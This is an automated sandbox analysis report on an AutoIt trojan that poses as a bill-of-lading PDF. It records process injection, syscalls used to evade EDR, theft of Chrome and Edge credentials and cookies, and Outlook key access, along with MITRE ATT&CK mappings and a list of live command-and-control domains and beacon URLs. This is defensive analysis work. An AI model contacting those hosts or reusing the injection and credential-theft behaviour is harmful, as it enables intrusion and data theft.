            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe protection: read write
            Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\write.exe Thread register set: target process: 6120
            Source: C:\Windows\SysWOW64\write.exe Thread APC queued: target process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 315A008
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Code function: 0_2_0043916A LogonUserW
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Code function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe"
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
            Source: C:\Windows\SysWOW64\write.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Code function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: Bill Of Lading_MEDUVB935991.pdf.exe, gNKNuXuipEBZec.exe, 00000005.00000000.2113285816.0000000001BF0000.00000002.00000001.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000005.00000002.4197956117.0000000001BF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: gNKNuXuipEBZec.exe, 00000005.00000000.2113285816.0000000001BF0000.00000002.00000001.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000005.00000002.4197956117.0000000001BF1000.00000002.00000001.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000000.2262976947.0000000001290000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: Bill Of Lading_MEDUVB935991.pdf.exe Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: gNKNuXuipEBZec.exe, 00000005.00000000.2113285816.0000000001BF0000.00000002.00000001.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000005.00000002.4197956117.0000000001BF1000.00000002.00000001.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000000.2262976947.0000000001290000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: gNKNuXuipEBZec.exe, 00000005.00000000.2113285816.0000000001BF0000.00000002.00000001.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000005.00000002.4197956117.0000000001BF1000.00000002.00000001.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000000.2262976947.0000000001290000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Code function: 0_2_00410D10 cpuid
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Code function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Code function: 0_2_004711D2 GetUserNameW
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Code function: 0_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2196592911.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2197276095.0000000006A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4197079082.00000000023B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4198283199.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2195135804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\write.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: Bill Of Lading_MEDUVB935991.pdf.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
            Source: Bill Of Lading_MEDUVB935991.pdf.exe | Binary or memory string: WIN_XP
            Source: Bill Of Lading_MEDUVB935991.pdf.exe | Binary or memory string: WIN_XPe
            Source: Bill Of Lading_MEDUVB935991.pdf.exe | Binary or memory string: WIN_VISTA
            Source: Bill Of Lading_MEDUVB935991.pdf.exe | Binary or memory string: WIN_7

            Remote Access Functionality

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2196592911.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2197276095.0000000006A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4197079082.00000000023B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4198283199.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2195135804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92
            MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the badge shown on that matrix cell)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
            Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
            Execution: 3 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
            Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
            Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At; Cron
            Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 13 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Masquerading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
            Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
            Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 241 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; Network Service Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
            Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 2 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
            Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
            Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
            Behavior Graph ID: 1540748 | Sample: Bill Of Lading_MEDUVB935991... | Start date: 24/10/2024 | Architecture: WINDOWS | Score: 100

            Start node: www.ly0.xyz; www.academyinmotion.xyz; 21 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 8 other signatures
              www.academyinmotion.xyz: Performs DNS queries to domains with low reputation
              Bill Of Lading_MEDUVB935991.pdf.exe (started, 1): Writes to foreign memory regions; Maps a DLL or memory area into another process
                svchost.exe (started): Maps a DLL or memory area into another process
                  gNKNuXuipEBZec.exe (injected): Found direct / indirect Syscall (likely to bypass EDR)
                    write.exe (started, 13): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                      gNKNuXuipEBZec.exe (injected): Found direct / indirect Syscall (likely to bypass EDR). Network: mjcregionsud.org 91.212.26.5, ports 50019, 50020, 50021, WEBINDUSTRIEFR France; www.numbox.live 63.250.47.57, ports 50031, 50032, 50033, NAMECHEAP-NETUS United States; 9 other IPs or domains
                      firefox.exe (started)

            Source | Detection | Scanner | Label
            Bill Of Lading_MEDUVB935991.pdf.exe | 55% | ReversingLabs | Win32.Trojan.AutoitInject
            Bill Of Lading_MEDUVB935991.pdf.exe | 56% | Virustotal |
            Bill Of Lading_MEDUVB935991.pdf.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            d81dp.top | 0% | Virustotal |
            myrideguy.net | 0% | Virustotal |
            academyinmotion.xyz | 1% | Virustotal |

            Source | Detection | Scanner | Label
            https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
            https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            d81dp.top | 154.23.184.194 | true | true | | unknown
            myrideguy.net | 68.66.226.116 | true | true | | unknown
            academyinmotion.xyz | 3.33.130.190 | true | true | | unknown
            www.awesomearv.buzz | 161.97.168.245 | true | true | | unknown
            huayang.302.gn301.xyz | 107.148.177.200 | true | true | | unknown
            allinathletes.biz | 3.33.130.190 | true | true | | unknown
            www.heeraka.info | 75.2.103.23 | true | true | | unknown
            levelsabovetravel.info | 3.33.130.190 | true | true | | unknown
            www.numbox.live | 63.250.47.57 | true | true | | unknown
            barbequecritics.com | 3.33.130.190 | true | true | | unknown
            www.ly0.xyz | 104.21.78.104 | true | true | | unknown
            mjcregionsud.org | 91.212.26.5 | true | true | | unknown
            030002252.xyz | 65.21.196.90 | true | true | | unknown
            www.lunch.delivery | 13.248.169.48 | true | true | | unknown
            www.academyinmotion.xyz | unknown | unknown | true | | unknown
            www.allinathletes.biz | unknown | unknown | true | | unknown
            www.d81dp.top | unknown | unknown | true | | unknown
            www.barbequecritics.com | unknown | unknown | true | | unknown
            www.myrideguy.net | unknown | unknown | true | | unknown
            www.60881.xyz | unknown | unknown | true | | unknown
            www.030002252.xyz | unknown | unknown | true | | unknown
            www.levelsabovetravel.info | unknown | unknown | true | | unknown
            www.mjcregionsud.org | unknown | unknown | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            http://www.levelsabovetravel.info/kbee/ | true | | unknown
            http://www.barbequecritics.com/el3s/?Qzj=6Ta3dC1SbFexLGaAyK/XrrF8DJnhB8YLWm/0OzXEbXNGBqYW7sBnSGIWAqT2FNWebLiZ+YaCaloaRZMkiWHL3ouL7ZTQk1OjsJsHDhDi+W4oi2FDqh4Gk0M=&Znyl=2rnxDB | true | | unknown
            http://www.60881.xyz/ynjl/?Qzj=PEs7u0VzI3DSA9TKYNWnz6gyWb/C39oE0a50vjpoFb3NQEkD5EPR31gJ3YEDEVY88OmbAto+098c/gTiopGLABAEMyjtpbfsUvV6UeXcuCjdlGHHhk6aRcY=&Znyl=2rnxDB | true | | unknown
            http://www.allinathletes.biz/te6q/ | true | | unknown
            http://www.awesomearv.buzz/53bw/?Znyl=2rnxDB&Qzj=y602DfOxy8k4aDGeL32BfjMr8rtJj4VEvf5zKPNxBw/5ZQtnSgrsDIShG/LT94BV3SRTeLh29bGmgRGfpvfkbNV5yHp9DO9ljl/7OAHX9kTVnWn3IiM7pPI= | true | | unknown
            http://www.mjcregionsud.org/r61b/?Qzj=3quBh4mzL0lL+B9uaAFlB72ZycJbxnt6GENoLoKygJVSWFdT0X7NdoQT/6uiE3Ni1BD7Zx2rh99upTwYdPvuDtoYAZVOuycnaW3rI/gIwuhnX/+XN/+iqEA=&Znyl=2rnxDB | true | | unknown
            http://www.myrideguy.net/kgyd/ | true | | unknown
            http://www.heeraka.info/o7wc/ | true | | unknown
            http://www.030002252.xyz/2ncs/?Qzj=C9x4nV75ALRtqPK+aAR0NWmp5g6EqVqabxnIo4b2Z27N+E0QPuJF7pA8iv4PlagxECtfepEWwKhTDmrEQ68cs056FDzHHej7JHydzS2yCPPgbwEKPk9K7sk=&Znyl=2rnxDB | true | | unknown
            http://www.myrideguy.net/kgyd/?Znyl=2rnxDB&Qzj=Wu3HLPqvQhberYZQa2vA+jLd86RSCoLcCB7xsP8R/99k0A4wkukwLWUZ+Z7OJCWhofveZifw88127MBJWT7MfBvd7RqI/EwbWL2cnrCtj+ZcWXeu3tlvVIc= | true | | unknown
            http://www.numbox.live/q7ah/ | true | | unknown
            http://www.lunch.delivery/qwed/ | true | | unknown
            http://www.60881.xyz/ynjl/ | true | | unknown
            http://www.d81dp.top/9m01/ | true | | unknown
            http://www.numbox.live/q7ah/?Qzj=yQb1MnoYePGa+D7HYWwXgG+nDQu6P4qgSNNB5eb+vdtsin1jnkdmikqCDVoWxFHrVuMckJ02SL88S12T7EptmvXNk3VDSDUHyMzwNFIiRJYEDhiEAb6niHg=&Znyl=2rnxDB | true | | unknown
            http://www.levelsabovetravel.info/kbee/?Qzj=DCgTIaYcg8rLkvez6aURNH1rI8GLniCnkbIF1Zor3lwvkrlOJ/rxEwh4juCbWbA1v3jo2CjSkAc6+9U16ObyIJEVbwGNWxBZ4iE6d4sVGLDCvtPxuAtI0Gg=&Znyl=2rnxDB | true | | unknown
            http://www.barbequecritics.com/el3s/ | true | | unknown
            http://www.allinathletes.biz/te6q/?Qzj=Bi48EnnHLnucFoFteZ9CbIdOGuitqrUowmdcea1K+IX7Dd8zgRCPoEq+V26bo8zYK23oBEB5tVQZMZR237sZHxvwddrlAP0HIvOhneqwjksiJ5dMJ78gJU0=&Znyl=2rnxDB | true | | unknown
